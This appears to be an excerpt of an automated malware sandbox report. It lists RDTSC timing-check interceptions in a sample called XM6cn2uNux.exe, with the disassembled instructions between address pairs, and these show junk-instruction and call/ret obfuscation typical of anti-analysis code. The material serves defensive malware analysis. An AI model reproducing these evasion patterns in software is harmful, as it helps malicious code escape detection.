                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 609E82 second address: 609E9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FC57CD4ECF6h 0x0000000a jmp 00007FC57CD4ECFEh 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 609E9F second address: 609EA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 609EA5 second address: 609EAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 609EAB second address: 609EB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 61773A second address: 617740 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 617740 second address: 617751 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC57C52C316h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 6163DB second address: 6163F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC57CD4ECFDh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 6163F1 second address: 6163F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 616582 second address: 616586 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 616A9B second address: 616ACC instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC57C52C316h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC57C52C31Bh 0x00000013 jmp 00007FC57C52C328h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 616ACC second address: 616AE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC57CD4ED00h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 616AE6 second address: 616AEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 616C31 second address: 616C40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FC57CD4ECF6h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 616C40 second address: 616C45 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 616C45 second address: 616C4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 616C4B second address: 616C63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jbe 00007FC57C52C31Ch 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 616C63 second address: 616C83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 jmp 00007FC57CD4ED07h 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 616F36 second address: 616F46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 jnc 00007FC57C52C316h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 616F46 second address: 616F57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jns 00007FC57CD4ECFCh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 616F57 second address: 616F6E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC57C52C322h 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 61AD3D second address: 61AD64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnp 00007FC57CD4ECF6h 0x0000000b jmp 00007FC57CD4ECFBh 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007FC57CD4ECFCh 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 61AA33 second address: 61AA3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FC57C52C316h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 61AA3D second address: 61AA41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 61AA41 second address: 61AA63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FC57C52C328h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 61AA63 second address: 61AA75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ja 00007FC57CD4ECFAh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 623877 second address: 62387B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 62387B second address: 623881 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 623881 second address: 623885 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5CE1DB second address: 5CE1DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5CE1DF second address: 5CE1E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5CE1E3 second address: 5CE1ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5CE1ED second address: 5CE263 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov dword ptr [ebp+122D198Dh], esi 0x0000000e mov ebx, dword ptr [ebp+1247820Dh] 0x00000014 push 00000000h 0x00000016 push ebx 0x00000017 call 00007FC57C52C318h 0x0000001c pop ebx 0x0000001d mov dword ptr [esp+04h], ebx 0x00000021 add dword ptr [esp+04h], 00000016h 0x00000029 inc ebx 0x0000002a push ebx 0x0000002b ret 0x0000002c pop ebx 0x0000002d ret 0x0000002e add eax, ebx 0x00000030 push 00000000h 0x00000032 push eax 0x00000033 call 00007FC57C52C318h 0x00000038 pop eax 0x00000039 mov dword ptr [esp+04h], eax 0x0000003d add dword ptr [esp+04h], 00000018h 0x00000045 inc eax 0x00000046 push eax 0x00000047 ret 0x00000048 pop eax 0x00000049 ret 0x0000004a nop 0x0000004b jmp 00007FC57C52C326h 0x00000050 push eax 0x00000051 jl 00007FC57C52C324h 0x00000057 push eax 0x00000058 push edx 0x00000059 push edx 0x0000005a pop edx 0x0000005b rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 5CE263 second address: 5CE2E0 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC57CD4ECF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ebp 0x0000000e call 00007FC57CD4ECF8h 0x00000013 pop ebp 0x00000014 mov dword ptr [esp+04h], ebp 0x00000018 add dword ptr [esp+04h], 00000017h 0x00000020 inc ebp 0x00000021 push ebp 0x00000022 ret 0x00000023 pop ebp 0x00000024 ret 0x00000025 jnc 00007FC57CD4ECFCh 0x0000002b push 00000004h 0x0000002d push 00000000h 0x0000002f push eax 0x00000030 call 00007FC57CD4ECF8h 0x00000035 pop eax 0x00000036 mov dword ptr [esp+04h], eax 0x0000003a add dword ptr [esp+04h], 00000019h 0x00000042 inc eax 0x00000043 push eax 0x00000044 ret 0x00000045 pop eax 0x00000046 ret 0x00000047 mov di, ACE6h 0x0000004b push edi 0x0000004c mov edx, dword ptr [ebp+122D378Ah] 0x00000052 pop edx 0x00000053 nop 0x00000054 pushad 0x00000055 pushad 0x00000056 jmp 00007FC57CD4ECFEh 0x0000005b pushad 0x0000005c popad 0x0000005d popad 0x0000005e push eax 0x0000005f push edx 0x00000060 push esi 0x00000061 pop esi 0x00000062 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 623EB8 second address: 623EBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 629A82 second address: 629A88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 629A88 second address: 629AAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push esi 0x0000000a pop esi 0x0000000b push esi 0x0000000c pop esi 0x0000000d jmp 00007FC57C52C321h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 629AAB second address: 629AB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 629AB1 second address: 629AB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 629AB5 second address: 629AD7 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC57CD4ECF6h 0x00000008 jmp 00007FC57CD4ED08h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 629395 second address: 62939B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 62939B second address: 62939F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 62939F second address: 6293AE instructions: 0x00000000 rdtsc 0x00000002 je 00007FC57C52C316h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 6293AE second address: 6293B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 6293B6 second address: 6293BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 6294D8 second address: 629519 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC57CD4ED07h 0x00000007 jmp 00007FC57CD4ECFEh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007FC57CD4ED04h 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 629695 second address: 62969B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 62C49F second address: 62C4B7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ebx 0x0000000a jl 00007FC57CD4ED02h 0x00000010 jl 00007FC57CD4ECF6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 62C792 second address: 62C7A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 ja 00007FC57C52C31Ah 0x0000000b push eax 0x0000000c pushad 0x0000000d popad 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 62C7A8 second address: 62C7CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FC57CD4ECF6h 0x0000000a popad 0x0000000b popad 0x0000000c jo 00007FC57CD4ED28h 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 jc 00007FC57CD4ECF6h 0x0000001d push ebx 0x0000001e pop ebx 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 pop eax 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 62C7CE second address: 62C7D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 634D05 second address: 634D15 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC57CD4ECF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 634D15 second address: 634D19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 632B17 second address: 632B1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 632B1B second address: 632B21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 632B21 second address: 632B2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop esi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 632B2B second address: 632B47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC57C52C326h 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 632CBF second address: 632CC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 632CC3 second address: 632CCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 632CCF second address: 632CD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 632CD3 second address: 632CD9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 632CD9 second address: 632D16 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a push ecx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d pushad 0x0000000e popad 0x0000000f pop ecx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push ebx 0x00000015 pushad 0x00000016 popad 0x00000017 pop ebx 0x00000018 jns 00007FC57CD4ED15h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 632D16 second address: 632D27 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC57C52C31Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 632D27 second address: 632D2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 632D2D second address: 632D33 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 632EB3 second address: 632EB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 632EB7 second address: 632EBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 632EBD second address: 632EE9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC57CD4ECFBh 0x00000007 pushad 0x00000008 jnp 00007FC57CD4ECF6h 0x0000000e jmp 00007FC57CD4ED06h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 6331EB second address: 6331FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC57C52C31Ah 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 6331FA second address: 6331FF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 6337F2 second address: 63381C instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC57C52C316h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jne 00007FC57C52C31Ch 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FC57C52C321h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 63381C second address: 633821 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 633B00 second address: 633B38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC57C52C325h 0x00000009 popad 0x0000000a jmp 00007FC57C52C324h 0x0000000f pop esi 0x00000010 pushad 0x00000011 jl 00007FC57C52C31Ch 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 633E83 second address: 633E93 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC57CD4ED02h 0x00000008 jp 00007FC57CD4ECF6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 63417F second address: 634183 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 634423 second address: 634427 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 634427 second address: 634430 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 63468E second address: 6346CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FC57CD4ED06h 0x0000000b popad 0x0000000c jns 00007FC57CD4ED0Fh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 6346CA second address: 6346D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FC57C52C316h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 6346D7 second address: 6346E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 6346E2 second address: 6346EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FC57C52C316h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 6346EC second address: 6346F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 6349E0 second address: 6349E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 63727F second address: 637283 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 637283 second address: 6372A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC57C52C327h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 6372A0 second address: 6372B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC57CD4ED00h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 6372B6 second address: 6372DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FC57C52C324h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e pushad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 63DAA3 second address: 63DAA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 63DAA9 second address: 63DAC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC57C52C324h 0x00000009 popad 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 6411D6 second address: 6411DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 64148E second address: 641492 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
